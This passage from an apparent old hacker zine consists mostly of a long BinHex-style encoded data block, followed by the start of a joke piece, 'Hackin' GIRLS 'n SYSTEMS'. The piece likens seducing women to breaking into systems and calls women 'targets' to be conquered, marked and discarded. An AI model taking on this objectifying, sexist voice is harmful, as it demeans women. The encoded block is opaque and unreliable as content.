  3460. 3!%YBIqZ3!(G`,MY%+1$ZJ-8&2#IXECI6$UF[f!-2UpM2dhKr+IelVFkaj[%[,f5
  3461. mqpR*1HV`@FUfcr)-AiqC,q0pQ%p64b"1cK$fiI4RLIZMLp[@0GF[j@G4QGG,XR(
  3462. Zp'fF4$8l,r+6U1rbNkJrGBC4(A91SIUKFhVHcZD'M@h1kpJ+bpZE'PZJm1YJlLH
  3463. PSq8j0kH[[D1JBNP$"mf[UhqJSk6mrXkQ$Tl01#AKQ6S8,Fp6ACaPY%8l3hLISQd
  3464. $A8TCC'qdI-Ce,NBKa`!lfCqqePSM'%cd6SPHUe6A&Pe#*d'CebZIBdrQ,aPrBL*
  3465. p*%SEeM142M,[laAR3jRAN6bRm4kF1KrLh2k4-bXZcTcNZrabL'afZ)H+HQf`)&T
  3466. 3)6Ak$bfZNlqiZ(Khj3mkC+efS9b5mj8h1eMPH@GBfmEm@JR,`4BaU09@9e8H)qI
  3467. IA995[V*Q4B4frGiH(4ZmT@J&MEU@d+UMXf0dMR$Yea,VJkeXTGQB&CMpJlkkXi(
  3468. !LN42FH9pB,'RmPM&G[Qa,AUdR1hpiQ)pKIU*3iZrr[h'J&kVe8B,5UEhl&fBB2l
  3469. +6Z+2D8P2e@Aj3RQba0!0[*CBQE$@,[qq-aE$CUpYPjmZfqPNQ*aIb"`f[G'U+'3
  3470. j,4TQ(#CcTY%bC"Rem[60"RSi4kfld@VLL$+`!SdjQ2*M+JZeMmQBpHI2Cl*8dT)
  3471. EQ#q9V%L%%LbEFjQC-jrjmr6'V""abXRI[Y#4(eX[ZY-$mq@Ec221Kf2B*BjSDrU
  3472. GX49QQFPb+qE,Rpdb1cKIZJ!*VmQAX(2N3VIMS8dXQmdSfbi(f-b+lEkcc6DBc`4
  3473. kZG@i(1KD9HRfh,9XGQ[1Nh804ZNQ&QIA2TRGF%0i%lZ(4F-l&keBHLHlX9A#G&E
  3474. C*RBYQeReeka,@kVAhPYear-rIk6b"cL9IK(E[53fZiG`AYEc@bZ@j#pKdj[2pQa
  3475. !RMbAENPRHS1pdGi"*-T(N!!l1,[@#RTLk@UJ"Gac3cUh[EpQ$dHHe[ac#qGYf*p
  3476. ZAl#6&BirLFl1pbA'HrMH1TG[iR,[mpJqRqAEjeIBNhc'afHq`8r(-)20k6DDmjh
  3477. k&CE[c5YBl[RD6CJk2S@%ma@D1HNKdBB($3f@LqTHCY&j3qBPp1Vja"qk%`1YqFH
  3478. D-pr''6A9ck-H4[fL@q1NND2mL%pred9jbChq8lIq2U(Jp1ECRPY4IB0AahPeXZG
  3479. @D0'&pm2&a@,6rZ65PUD1TR9EQlSSHhYaAXV2+ri%fQ&,%GV4b4ek(k#kT0aHXAT
  3480. &ledF4q)iTcb0-Aq+F(Tr'bI$iY3Ufi,hm(k'YVE-9rQ')2%cNUq`IGK2F$kre3m
  3481. rhe"5RUj$'Mc(@QpLlfYa4M02SaV*2,0f6b"El(Tlee3Z@YUqY"N(JmdipklIk*l
  3482. BJH1KN[)epU,&#mYPeYXcVaERpP$ZMS,m*3j1lMMc)h9qU("%-2R%QNe0'cB4iL3
  3483. $1TNX+'Cjd1@6a#"DRRlL#iZr1ZL-VIkHRHeTm*QDYR@YjJ2VQVDZ@mm2(TR-cr2
  3484. arTbe2EIL$ip#33-Ee`j+Ua5fK03DE'D5IV[cDZ@r$$#YQ@fYh0XlI2HHN[*l&Uf
  3485. SJNipaKVUfQD059eYM9DYEjqHBkbSQaPlT5%hGN1GE&e2QIZYrSE"hLrfIT'MV9L
  3486. %hBr3HQl@UPp,'$2UXQ+cr``-XAf-p(i4'dTYE(CmpT'eb2Vc&9CMTR*)'h0R(Vm
  3487. iFpkGX9TbpjV0@FF5jK$1K3)dbaJf,(q*bI`k0Uf5@QMj-`U`19,+HZNlKH`f+EA
  3488. SqrrQ4hE+XUbq&iip[1bRV&`[!20h88Ya2XiqMrP2rphm6Nhk"i5jrc#I2mQJSR[
  3489. cM4@l0ZIEhIBZ6'US1QhD@UrP%jfBcH@6@CMU,1DlaGHk0f6TV*99GKjjG(eqp`Z
  3490. T4)aCL95LX[0VMkkrSCMhD#Uej!k@@[,B#p(Xe**BGQ8R1H+ehDpp!LJMh5rd24V
  3491. c[GKAl%XY1GUA@[,$4qYcpMfmhNqF9bEUAUqNBqBH[)mJ14j"[4G[MIRj1H)3fqI
  3492. @iPaaL$hReMm@Y83RpP62GHY+Yfi4Y9`SD[mh8FZp3p05SXlqT+Mcbphk@9&,Bfj
  3493. p305-SIC4cA*c6V)Xe26'dETh1BKm3Jqr)M9e,@VLqT!!1mrB,*`6apM6NSeYeB2
  3494. MGkPQXd*@+-ACN!!f0CJET4$Y[R)e+KYLj1#H8J$86rSF"`$5%b-,hqVa*kBr-ec
  3495. lCPUY[[A+QqCS2Zf[RTiHAXjlK%P[`UHh+p+[RfbcZRSCK%D,Uh2M)R2P)QSZAN%
  3496. ,!kQd0&NC%4fm%p3Sk$[jXFa(-miEhh[MHaRRYHm-rM6cd@k`p%J9p!PMA(RFmAG
  3497. eCc01R$L"%K8pVq*pR0H$Jlr!Hr$%kB(6,jmHQ+TrJIIJL3(8!e3lU*h"9`HGFE`
  3498. c*dkm6"51!TSr[j,GFr6I2k2LQ@LZlYV4Y@1('"TcKeGe6I6(k0Qa@Y68[qfffmC
  3499. @V4,eIqPhG8hdrk+SU)Mk[%ErP5,('H[D)HUadI(aF9LSUd[8Bk0GA9fVGU!J99D
  3500. Y%U3[2[p0hPpj3(,kN!"a5'J@B#2XQUXMj-qlr(h15CEY$,R4Hc@"jcH-*bmkrY0
  3501. $kFAcbhe1$*`B1(lmf-6imCF(AXEM$TmiMZ'"P`FSi5MMMJr300i$aemq-A"8M#(
  3502. 94(f8jJF'MJi-L2VSmH18D%G2[#aUc*mH'1LMH9krH[a5rmVmZhKZrf@h"Mm5M[U
  3503. m"Kr1'h`prTrQr41L4Vpm`(')$kr4[ichjiF22q1-RcJKkU-RALAGIJ(PH3fpi39
  3504. 5'Li"*)K"mCH4hc!)pEd-rpXXrlm2PUfV46cZ5M'jFe`HAleU94HpmAX2J)q[S[F
  3505. 1r0i"%*X+(ke#bB%ZNX8ZX30MH(CJ%0-##'5`AD!l0V(Pd%-F,r@"2iUGaAf`iQ$
  3506. *QHS$Ia3EMAL+X#+Y@Mh9VaSEhB%qYL!mc-1Il+m@q*2c9DZUhZPcrT0pN[LGrYJ
  3507. SmIdEIPeAjV&8AFB(hr1ZPc#rHMA`*[Y#RdQpi4R-Ap'IYMThR[1El'-Hr&j"LrB
  3508. 86jq,r5[mi1mVr'JV&)ZK3dXUha+p2[QMDh)aK+GhV*lU%ckYN!!`I"@0dT)VXS4
  3509. ERIa2NR@YjYP44IKm&LJdmGlZq6phdDY!2$0a6U1bEdR0V0ZfMp$Tc16%`qi%A3D
  3510. KTj@0XNHNKAkjkNkai$'E98S,Gm[hLD1MD[6ASjr2l`KVPFrIVYe(ph9dGqAqHhc
  3511. IQ6T`TH0DN!$&K3&F*[ZC02Z1BKE%*FfCZ2DC[f8p,JVl@ZipPSJZB&Q9&m!JK8-
  3512. VRHAH[BFI#MmrTeE,DbcAlZbTZ291A!Z1iE,GpdUbF3#BU+kU-eEYi4I"jl)(dUG
  3513. `a8KYPHBPQ&SAp&#NIG99VBaQPJh1lRD'kES),M6Ndl86jpA8cpKX+*&[$MU[*Nq
  3514. cJ2B6l5GcYV+(YCA43TEeJaBJY$K[d&9`D6FkJqR(d`I5rccpjqLpQ[i#CrdIF1(
  3515. Up94IV0JjQATKlki5A#'(VVQT[K)FE%V2cdPSHH#V0JB)V552BriP,U(qK$V!2TA
  3516. UXlYaADmBPm&i*hf5)mePEHRM9,8kZ!$&d[ralMhT9qE8dJ63MjINY8TmMY!``I%
  3517. iVr5ri%VYKpl-q6%GIBZ,K"*GMXeThIU&Q`T6@RlMeQJ4bi*Z4EK!#0hDVMQfke4
  3518. h-IZ,2DR[BG+2b4$0k8b$Lq6m,p`d,i9,`cRDXTk#9PBAjGIiF&8j[He@A&*PmJH
  3519. AX#aY@I9Zr8lbN!!*,iN1A3",Yf[jh(hmfJ,8'#6I3Bemce1NE@&Y54'8,),fq@P
  3520. i,[h[m2l*45hIF0&ad9HJ`lNjdEPFaI*ZpQ+L8G@f-TPddUV[K4,k+rSVZ+l,9D%
  3521. HCi%%%0IjFHdHq(!#VXfQ2dV)23@NEL(dG*N1dCALFU39%LZh)3Zk-japJ[QF6C3
  3522. 4b8&RZ'Bh-B0lchkfa6Q2HKMeL28dric"-+i`2e+Bd2,A9VRSAm28%2F0,L%63[S
  3523. X($+8EKIZ4TVPi5+hR2lhP$R12F)A1GQ-h9Z&DkCj`$f1#r*l8,p@8p8UpbeT[*d
  3524. `k0S$TZP#kA'U8Yq&%ZG6IAV@[ZlAGLf8@N95B,)N(pKrbC&qdZS(rZb5['M@AQL
  3525. (+bJ#"5`j"V+%qlE2i9Hpk1LH(p[,"R[T"Fdbk$*"AbVaBYq26,T)m)-AY4`$"rK
  3526. )rDr4)Y!Gi2Z!KTrhT0`h(90)lae9L!N2m9)A6`%1N4Fk6Ymr[8I`([[(0hK1[8I
  3527. SlI'('!Pk4jbaK-(Na-fV,&(Ab+*1A+kV48h[L226%FMTeeM*X-B+9BhGp[ZDla6
  3528. 9H&1IjM4rJA25M`XR`hLM,TMJM`IEP(H-6bG5U'@U"`DBccfdJfZqp5h8dhEcKf8
  3529. pb"q@,GCIPQ2cKdhAqF1ZqFmlj$@6TiedUi#G%AMdP2bQ,`M[hZhf#aAhNDr@dGF
  3530. [qJ!1m26Q04!QqL6j9(qASJ6qTZmiPrUS[EjKAF+,a%3I@`1EiZ2bprajKQ#T$j2
  3531. [h[f*r@GL)%Rp"MbBQ-!MpcFdE[r%r[e2N!#H&rdY(1lliG8+8[[+NidXZ`DR+&G
  3532. ,1"1rc2eU$(G5a(R-4'UlU5bl+HcE[jqRYhmr(Y66U0krRf8e02"q0YASjlKT2pe
  3533. 0qe`hlI2FY-ph8hl'2k6k93!H#3%jC@fejJ2eeN4A85$U5M[X*QR`ZSff[AM*)Jc
  3534. &1jCdfTCk2ieGCbrKiah@GGH6Z[YXNkYZ@1VeT0kqHR-IbPXMX@Z[,pbpZa[cqf#
  3535. DkFB+9I56EKri["mAr8KXeL@m0VHrj(l4Mi@Zli0+qaBYrcc+kEH!$qII+IMI![l
  3536. rL[S2h[m(SKqk[RHrii$2ja#DScGMRZ-p-+(A4dqFq+PcVV%4"rf1!chE5,pE1KZ
  3537. j#cXXYG&HNPbpTV'KCSRGBG[@G3mqZ0*Hp0ZGMAC(`dVd*hFSelGA)AKb2Xl2k@l
  3538. %Zj,kANl"`kk0DDA&Na#hSIifmA-i[X+X!$RE8+f!T0LQ"41JDbTa@`dV'&A$c!r
  3539. r"a8c8+VDCXL1++CL"XfbH-`-+UA"'X8U8a1+U8C+`dSiSZK+5&'NH%K466XF$+X
  3540. 4-f$DDSJTIP8T"4d$ND)'H++%3S'!EB5Pd+a`)""35Je,!8Y9X@+4J")X9Aaf4&+
  3541. @5iUN5P)3@ULUSKY"b94#)!+@08UB+B#1k*4LFSaQG1#VbNT&3K93N!"R%UMiiU8
  3542. kBNleQj!!ae*Y)US%`dSd%$#93"$L!LmJ"94E#8TK99(#DLJ3$"R*T+%%3bEkJ8"
  3543. F!l%DDhN5%iTFTTLQ,flUX!8J!dT))aFTBG-S09GLaZ,V!%d%)9%LU!C-96AMLT)
  3544. `3f&&Kc@3!+e)9`81X0&Ar,SD9p95+fbBm!Bdm'&Y0293Z03(H3a3+N@GM%"99B*
  3545. &bZ#pN!#ZP*@Uj!89#LU5U8,A)%5)5J(6$#Pf+)c(,Je*9J,18[5JDUV35j%N+45
  3546. dbjB(JRB)RLJeH-,$4$"3Z"4@$+0T,P)L5U68Y"8,4Sr"6CB5$2K9%eb83#3-3NU
  3547. TCBGJ&b9%8U[+,-Xd`U@K*+`9P",a3#NS+k8Q*X-"-!VCF"X%S&KKLJ4-#l1)'UJ
  3548. Q+D8"-kB`+3QbNXq#bp9`h%3@3EP5#B6#bXdDHQVB9')5'Gj80F@dV6*P9K$4B+)
  3549. "5D3B!)Ah`NJRf-8dlB!8$"S"#+F#%NNL+6AJ,)'k(T*#(0T5T9$!#UX)28KL+9B
  3550. bS*Kq+%F`a-%LIj5#6eJbQ336Ni%P0Bld3B*"*eK#a8B89fa%8!Jr9BA1#"$%Jk3
  3551. Q5@0l1EN)ZX#!!!r$ENSiVUL"L"%[JqGK$6H)%8Vq)#NPUc8f021[L#YQ'I3A34c
  3552. #GFd`@EPDY@0*NaQ3!*0F1a(%*LLS5SfK*'(D@@@aZ'AC%"#j*S)Bp&@BLVJVUQ@
  3553. 'c4!*JZ`33Cb%aq'M**)HrJF%P#&aN!!F2)L43F&S++MB&K`"VP*Te)4UX*m)BPJ
  3554. 32*!!8XKE-f3'N!$EDY+@CLPZ%*2e*"11Kdf$XP*'CN+kFlY4%)-YV+Y)-&%5[*!
  3555. !!#5!6`ql33`AKT8D&Ei#ja#NK9HJ&eL))%CQdaT!+3AFm!H3!([Fq+Dk3S%$3NJ
  3556. d#j%%Am'#55aZ%8Sq43dL)V(eK0A5F%#'@`+'S[KM5&4!"5LfH')(%9%f6%f#mb%
  3557. %H,Jd'E`CKLUe&6880%-@'L3Up)62`!fl%(F[l6Kaa3UTDS)BN6PXb)L)8J2"P8T
  3558. 5LGd-J$)*X8lNJY`FJ3M(aP*$U`Ul@9d1)@L#PK-6HaQ-EbPf')ST5X3U0A8+9F`
  3559. +F`"9$G&HJ4d#HTJ4'pTL3k!pLXb"d$!45dUC'Jk&&-PBC',l-#e6Y3-4'`+TjLb
  3560. EGJ2`J)U5A`AK1)5dVE#PK-RqYNPkQH(P)@9@`N61@qDXB%$&,&GBKa8X"$TD#U8
  3561. H8S3XKEd![L#&I8JK*43h*GK-X,6ML#6NP-hY$`("!"4J%*2VDJ0"5CEL63UESG*
  3562. 5*@c8b)Z849Jb6"YlT4@bJRB3lSA#38KLJ!b3!'0)$0U5b$i4+j3)NIe*$MJA)cE
  3563. F5C6K+L88,,86Y&!"VBB8T-H%!L&9YU%%9,()JEST*@4b)RQ%Ee%8JE38U9#5far
  3564. ,@8#*)ecmN9Q8Z)MR)0Ba#-6Y$`[@m*49E&5'BGp-L`Mf-pKBE$X)FT8@+`42NPC
  3565. EV'`JLDLh9jTa1%i0"d,KU)MTQR!iC+T*``S##Lj@bLaP%E6!aMFV@4S*Blq46&P
  3566. 4lD$URK"-Bic1SA!bKA0SIN+&FqMpqaXDk%5,prQ*&[SidD+65*`I2(5eJC-)24&
  3567. @%MJcN3dpT0Zf(Nr%$0h3rC'bT&qA)lVI-R`a1fMSL6*0el5B*ZXa24baBVTY*(6
  3568. !ahA9X+c5B0Lb)Z#4X!cEXJ,m(#B@#`B6LE!H5qM"B$#Lf6+B"8')aB)keSTiSM4
  3569. XK28`FPbApD"Z@4Uc*%2Ab`KF0b`Y(06dB#!US4rf%A00$PUkCF6#ZQlTY2$L-%#
  3570. AbT+3!%8,QMEQ$GP1J#K1JI3)@1Yk8!Bji'%VaP'4T!%BleK3MYVaD&+AicVk`9!
  3571. #a'cEEm4d14Efa3`MA'CVXKpU5+!B*5DkCQK*`b#$q'RCj3G28P!cJV+PkTBGXE"
  3572. `k9&GmaZ*-1%CPK(%GUVjpA"#6PT@dX#A'$6LDi9a,UeUFLb#KSaV)$V-)a[4'&3
  3573. e)E!["Zp&j8K86j)A,!JD0R659GB-(2HSKKicV#JXD56e8X-IK,-d@ECe'`JiIY"
  3574. MrQ4F$rU6TEB1ij($B3%b8!4He0!dB+qB"TdYJi`1raN`#Sj3$&)Z%!8K2@,i,5L
  3575. Lkh%Ui!qrPSMSm4L$l%E)#N&T13)F#`B#[6M)"r''Al"hi56HJ(h!(q!5p&8MFPJ
  3576. aiU42R&bHL0K3&jN3#F-6$&mT)K86X)*%@U'&f,&p-4hU3aBd$#52$%$Z23f8C!Y
  3577. 1`,Q5,M0,KA!@+-K`ZT'd)$(&3DNH)fK$0[@BbJ!!CVBK'rjB%,X+0#8BF,"PF)k
  3578. J(d!N+6!a'6L-5!T%'GaNk6)XBGY`-I,GJT%JL`8)*!TTEm21NN(k'mJG-U!186'
  3579. N3Ae`5#DMF$@PNQA,#S95f)+5%-l'VU0,YXmb)P&b(JpL,"JD@GNIXT2qH$J!1A@
  3580. i9[H#'+P*3CU``R'B0PRQXreq+dbj)S+Br'2#)*B'MH"D3bmP0@AiP!Ga(%cK)d3
  3581. Ih!1lJLU*!fH+)%B'qB)a'Dk!DNMS5%3P9r%-S5"'XL%3iDX`j%,1),GYR-YC%6H
  3582. )35KX`2(N#%Q1a-K-&M3NZe%3J`UX#er"1(#$35&LK+2-#f)p!)dY+%UHLI[K2Kl
  3583. LB#'#'-+4Gf&*i-*L0V)#!#SPC'N3L,UIJ59mKG#)iiC!$-N(6#E,#)#!RY4d"@D
  3584. `!K!KL83PlA%+3EV#)FK$k!X[d"c2IEm@-@)XS8H`h@&hm1YaRf&a8@%1(ZJD!Sb
  3585. lPr,--Z5BC8-T5)&%J$()k9E3(c0L%3DRBahN'a*%iqB)d#d95L"%(8jES#Hrab+
  3586. 6d2#4$6,)V!38#qSDZ'Xbl4V%J*Z$!M)1'8"+J['d1!,CaSD!2BUE!c'+@0)M@-4
  3587. LXE"QfeJk$-5qE3@4f@4rj#NN!!m'rMLeXT+dV0N-N8(f0fc5bi"4i&Kb0F!Y1BM
  3588. GMV`Be#3i@UESKMbd(e++36j,dc5ZX!*B@5qc-BKd)CC)k&)%T3jcN!$#%"#F+'f
  3589. `NA"G,5!BC4JJKIek@36ETfeL(8@N3)&%`T!!il,ImXPFB6qbhZ5QLIKTcB'jD9@
  3590. +qq*3'2DRI+(%3+4&i&QS6eNImaPfN!$X6fP$#T,)Y0r&L#KB3#YD$reK!dI&X"&
  3591. jK1KKA4*,83*V#pNIbjN9M'#l##H`+pJ!#b,ISBXPNrfa-B)JV8B'a0)5GS)[)N%
  3592. rI1GZ1`Kb'iX9JXHJ*4$,08K'))`GMpJ3(6Yd0%,"LDd!34$AlDJYqmY!$3FTF35
  3593. @E[PJ4EY-LaU'M#8'I#`SB,&i4,-XfX5B*5FK'16JUlSQilamm[D4Hq)JZAGTC2F
  3594. ZMFqp3q0hlp!`G[2N9d*`'HH#T%ihefrVl0#+LqP68%c#*jM&mhjT!JP!MTqq9HZ
  3595. R6pfaj@,U'LEP8emc1c6hihF6)j-IfEDCC&SlY)TYlCZde,DfG5h&-pDd0AAJ8p2
  3596. DJddGQl5D68dY@l5NpS(LD2'-hUVQVI9JJqpMYE@f0EAAYmr95Mri`6,`H*Y0ZmN
  3597. PUM@eDbhE1V6@Y[TfI%TVk`jY@fYp5h%CrqUZaMmVVI'EfX@H00U'ECeE0h,3pI8
  3598. Db$8hYH!$R4Z,2q4pr9QV&i!VYcAADq$&KpUeG@fBK%ceE9Tc8hYl8dZMKJ[J'lD
  3599. eYA@fGK3AH[3fV@X(-8MDhVN"X1d0R4$P)Xhj(Y#$!#)9IS-c9p[B#AQfDHYDA$h
  3600. `3C-Ej"ZihHEMTmK12RIMK)IRZfpkEX,a%&eV&eL2Gq2+PG[le9'5$#aaqAh'dPG
  3601. i,6hc*lM'K5mK2FSIaVj66Eq*DeY6MmH*erlK`kbALUHSf%Y&)SXGIRX9IArTUN'
  3602. PRr81ShL+LVe8*2"aIhJbC)I%%P$#[[jH1RbG6iURKcf-pf-A8i)`(qrqKYX6pD@
  3603. 8b!'@q-bqrR@k,XCRN!!5r%[mJLP9@$"i63X'eA685A8CJY[6Je!%(Pp3H#h`"JB
  3604. %hX#!`+0TU[IMfTQS"CjBB+J@H2[h#cbqeU"ZD""i$3d#MeBH83ZmKJD"4efUbmS
  3605. %APQC`#XV%hKPC3+[$)qS[D0Dlbh`D1N5YF"M61!*Qj!!fJ*,+%Sei9&0H&36RR#
  3606. &1%S@H-)IlY%bV`@Hm)HBTPViJfU"*rcK(N(c@Z!*Ia!,J5Im3EA!%rkJ@Z!*Ia"
  3607. EJ5Im3EA!%rkJ@Z!*IhLH%&ML,I#%2kJ@H-)IT*l`N!$`"p@%4cAK88ei3Q@UK6r
  3608. F"CIA!NmS4VA!%`c*$3*26,J,-Um&R[#(ZaDM&[kJ@Z!*IhK(pe3,21%23KGi`Kp
  3609. 8#ccK$kS&R[#(Pa@H*`5@H!Xmi3qK"Xd)Ie!Y2#6m36AK88ei3M@UK6qS&RM#(e3
  3610. ,21%2S5l9`KrZ!3'["Cj3Q'U"*a3K&`Jm`B"UJ5Im3CA!%rkJVX!6rU"Di!Pr8#h
  3611. `K$qm$2@b`[1%`"*[J5Im3Ha%jJTr8#dm*2a"0H%*&DJ@rU"Di!Pr8#h`K$q%@P3
  3612. ,Ie!Ym)3rU"Ci`Kp#9DU&2kJ@H-)I9!XmSE43RfUK$08#6c#K@Z!*IiKUFVI`-Y6
  3613. ,#Xm6!NZm*dpY[-h,fkLm6FREJ+BZS8aY)Yk'i@d1hNEJ*EfAi&ibHiRV*DQAN!"
  3614. HmRQ*jL@9Pd"HXRL*i5@"jh$2ZCiM2DGj$[+Fi5RZ+HNTj$(h'$(QIA$-qliE[cU
  3615. 1jr"K8H0L1Rp`NC`rq&`%Ilc$0Zq#-Ql1ZFr9,KKj(eN6AjmM,[33&hU)#ch%K4l
  3616. L3JpaSBHiL%[CiMEl1kG!G(i`8@I['[fhScJaR-j'Ga8G+rVr1h2Ck)8LGZ$YrXa
  3617. "kF#"m5jflUfLD50G"`pfMCc'h"P[lUX%&XBAciUNNB1$r6,QKiYBehJrkrSjMCc
  3618. Zj`JPE24Fd9Mr@*(rh,Q4VJ2Rqk@$)fH,f%(J($b&`I0&dmk0M(4e(F`)[%+"GjB
  3619. SA##`NBYJEaIj4Jlf#k"E"0!`!Bd4d+M,RS#'Lq34&mF9i*F61'!Xj#3JM2Ah2eq
  3620. 8kFIRaITp4886!TbC`$[Z`AbV++qrU+LIr`#N#k#h""!l5$Kra#%1ASBBFL&'6Na
  3621. !G(N3e`Q)[bjL)d!i3!KI)0Q@LVP"U$r@2`)#d$FEZ[Ah3lN46,j40"eqS[k",MK
  3622. UB[B-T#FhN5'K$F-rD[#B%-14-G53!,[V!SNbdLmG',Q!k6I42A"@f-1E1qGf$Sj
  3623. !IXBf#akr`*YeC4!&9)m44UBrjf$AZA-N!'L4qpL"dD)mXLT%)0r$`D$a,KM2MNa
  3624. r&JD+-%'b`-m-(kpfUE)$!$j30)V"FB%&'Z0)!6"cQ5*"r-48#%F"m#i51CkdJ0*
  3625. mNSfm65cA6E#Nh$J)5FQN"mC&(f!b3)NPd%E3i0L))jib9e"FBU-H933BrRI,"--
  3626. 4`9!S4"44RqFK4362L9a$lK+*Jq")H-6a)SbB23IHU!p`IY@6r-EkA881MT0"b3d
  3627. (!6U)0lF#1*d6e#HQ+3P)3P$#+#HdH),3Z5P#)S(2F$B5jIbNL1cJ,eePhUBT#Jh
  3628. 'lK)d6Y-%`DpfkblLrNZHqPNLp5Faq1cEVL6B%%JYa-+N+"0)3QY8N!"ef,2Re,4
  3629. B-D!Gk(!&1BdU3B1G3a+k9L!`Z%!X'QIG2"NXNXj"M)Nj1!FT4%jh0aAb+rJXZXM
  3630. (XbYF`d11VcQ8dK5&Er&%2RpamMbirC9JBIq'"3m8MS82*#,VH6T2$PdSHJYl'$Z
  3631. 3!"%159dN3B+I%b6B1Bii+K$(qNq*P2)IS2`P%hV$&!TrHA&AB#-JFS"-6E$X(-p
  3632. T6KaINHcr+e+$KmU9kBc(`e-92%K6JF2hL3XJ4541Hd&*qPkFT43H[b`',8I#J36
  3633. PVSBBi8RPdL#c8@l`@Gp)84&jpKb-FiN(6kVc[%[E+Ud`2"(2rE@Ei$$8j,#[#jX
  3634. D#FKj,2Gi$2%9L[YiV0m2V[d(N!#K2!`p-X+'&15A%(`(LiVi,X!ChHNbkJ)MGhe
  3635. `i4!1)ZFmh35G#rhqeC26`LYXj'G6kR5p*4BmE"&MrG1!GV!IS6bj''$"kJFb)4'
  3636. IDC!!H!)"K#!1K%95-(DIaqM-P-N)X!ZpLEJL"*F8bF&$JYBC#23ZPJZ!EC1a64k
  3637. pAhVd4$Y6*'1E`cE2Y4AmhZBl%!M#P,RZYYMIA`5%,,$$k%8m[Q1"*-*I41`f3C4
  3638. ([,FC#J-4@CpB$-@L3-R%TrNq4RCi@eKfM"1GJZ,4#VIb$6FMGP#aD,5`89,m2#Q
  3639. &fD,*"IKXdAQ3!*V1pf+Z)CqL2H35@)B@R)2R4+45`pZ3!$NHcqdc3LF4EaI2B'L
  3640. $)T)B`$Tr32MK02K-*MM(m[Cl$X,Ai3qrHr"$b`[dKr`mZA$1J+AS`*[B3l,SY!&
  3641. X4iZ#hVP$dH4Ta*QTS`NFT2cMN911k$M-[i[4ajYlf"kmIjGZXdL$q(f(h50GB2[
  3642. `N3Ta38Bq*LFHCcQB@iZjalejVkE,13X[1+`[LfRiCQGI0Y2'm2pEh0VReYQS`f1
  3643. VT$@mIeKkjLT)r5`@%Dkm4C3PSR5YbXY*ahm96Rlc2FFI`Gb3!$I[eH6iM`'rfbf
  3644. cfFI'(#RMeQ0Z2B,k)5M4JrUM8+Ek+NMp,,B6!BabZbKE49NR5Qj912jU#$FT2l+
  3645. 6ep*ArrArZ8N*F#UbU,L"LXhi#`Zi!(Mi+N)P[U%bM#+,LKZSf)clUV32I&[k0RI
  3646. LGHb0pp,K$EcGr`Kf-4eQBqlalTXQHYjcPrX',IlMkI"4ppE'l"AdZF3F0`fQrXA
  3647. B"!GHcaM(VBT"E#XC*XR*A(3,d"dDii-,d4V"S1mDkRi-h6(UrM4[R2h#B4RUrGl
  3648. &h['m$$LIaYpjNH32jSMH'*XFmTAQLKl)2*'2PZqdikF3qicEC0fSRjUD(+*Q0LD
  3649. K$qZGDYC-0CpfQhjmG9$k%M@[`H4*e(rX0[dR%D+lU&Q!b5(8clY02cj9+6p,cB@
  3650. BK0cX"FMd9iiI(IRe22UHpXmG(m6i,MNBImZ#ra-*(rl*f[[aRU[phAAb!GH9lm2
  3651. R)b[BYr[`CbliX`Vr4-h2[V2lMl3C'Ye0EmFYmff0q+XmG1PmF9Ypr4TF#5qHJ@&
  3652. kUVI@dkhZ4I2Z`RmUdA"cI&h(lHkS4J3Q(V0UfHeFM1Ce,61@NKiYp4fhEh-R%ZZ
  3653. fE5hHX+hCTHAGMemrG@fH4Yr6djAcmRpq#qdiA[J54Qk8-qakqQmQk2f3!2ka#HT
  3654. AkGqAS2jjXXTHK#hPl-UPpq!2BNKc0QlS`*m9Nf,fXUSP1-HiBfQb#KmCNPD,2ii
  3655. KV4Gr*%0UX5TYi%YG64[Dm6FbT)qMMU2HKaSlM(4!r,d-kA$6KUddpdh802HLZ@a
  3656. &$AJGYCI@,-1rkRK$r)-91AG$d`Em'brjfYE@G4fSLqpD9,N+p@,k,cc-*ppA[64
  3657. C`kE*Mce3hpB1["r6(P9)AJdp1*Gk50$Ed-1Re[RFI26L6(BFN!!Z4`mI'+AHc!E
  3658. d%[5CdKZC-KFprUp*#PRS2[6QLkaACI45E"I["9M`)h1a1&,2aTcUc[d1HM9ZE`G
  3659. kG5l'1(VhLK#CPB2H@M%hD`Ck'phH224DhGlpk(@i[EI4fb4keikLpkcSA8HF6SV
  3660. H$4*khd$!AD1aQkDKGachZ@HKGaek!jJV31p@&YTqA'KcMi(Hkm#i'A00k"f6S6G
  3661. kHi$A3j`dT[prk$e2H"UEX`#pl`ZZYbRSI9l`L2d"H[MI8h52I-(ldH[$B3QmXf!
  3662. aHLp*daQbB%%MHMZPA(BhHPhSECAb'2kZdi,2S,GAF&V`CqJG`EqpJiI,Mk,hCA$
  3663. k#'0hR#E(q%i4aSSiG$VLHj0k0A1!mC3%lc+fHMCkTi4qDhm,[66j@'0hMk!AQ&R
  3664. eB!Zqcq"pY'%Drr6$p15kPMrVd&CdYPcTjkrXf+M4AbE6jQRU04HEp)',GcjS-F2
  3665. lP!A[jZ'[MA8dEG"UkVGhC&FhEHMSE+[hk[m(4#S!!!:
  3666.  
  3667.  
  3668.  
  3669. ------------------------------------------------------------------------------
  3670.  
  3671.  
  3672. Hackin' GIRLS 'n SYSTEMS - .... 
  3673.  
  3674. by SevenUp - sec@sec.de - http://www.sec.de/sec/
  3675.  
  3676.  
  3677. Hitting on girls and hitting on systems (I'll call them both "targets")
  3678. has quite some similarities. If you are good in hacking one of them,
  3679. it won't be too hard to enter the other one....
  3680. It also represents IRC channel #hack's current state of mind: 
  3681. Women's talk is taking over. 
  3682.  
  3683.  
  3684.  
  3685. THE GOALS
  3686. =========
  3687.  
  3688. - Biggest Challenge: 
  3689.   To get inside the first time
  3690.  
  3691. - Targets that have already been successfully hit by others lose a lot of
  3692.   their attraction
  3693.  
  3694. - The goal is to keep as many successfully (formerly virgin) targets as
  3695.   possible
  3696.  
  3697. - Different game: Hit one target from every region
  3698.  
  3699. - Mark every target you hit
  3700.  
  3701. - You don't really care much after you got your target, unless (in rare
  3702.   cases) you love it
  3703.  
  3704.  
  3705.  
  3706. TIPS FOR BECOMING SUCCESSFUL
  3707. ============================
  3708.  
  3709. - Key to Success:
  3710.   The right "defaults", depending on situation and targets
  3711.  
  3712. - Be Cool:
  3713.   Don't care too much about the target. Don't get involved
  3714.   emotionally, but play a little with the target.
  3715.  
  3716. - Knowing different languages and keywords may be useful with targets
  3717.   of different origins
  3718.  
  3719. - Social Engineering and spending time (sometimes money) might lead to your
  3720.   goal easier
  3721.  
  3722. - The more targets you'll hit on, the more you'll succeed. Just ignore any
  3723.   failings. Remember: Better to have tried (and maybe lost) than not even
  3724.   have tried.
  3725.  
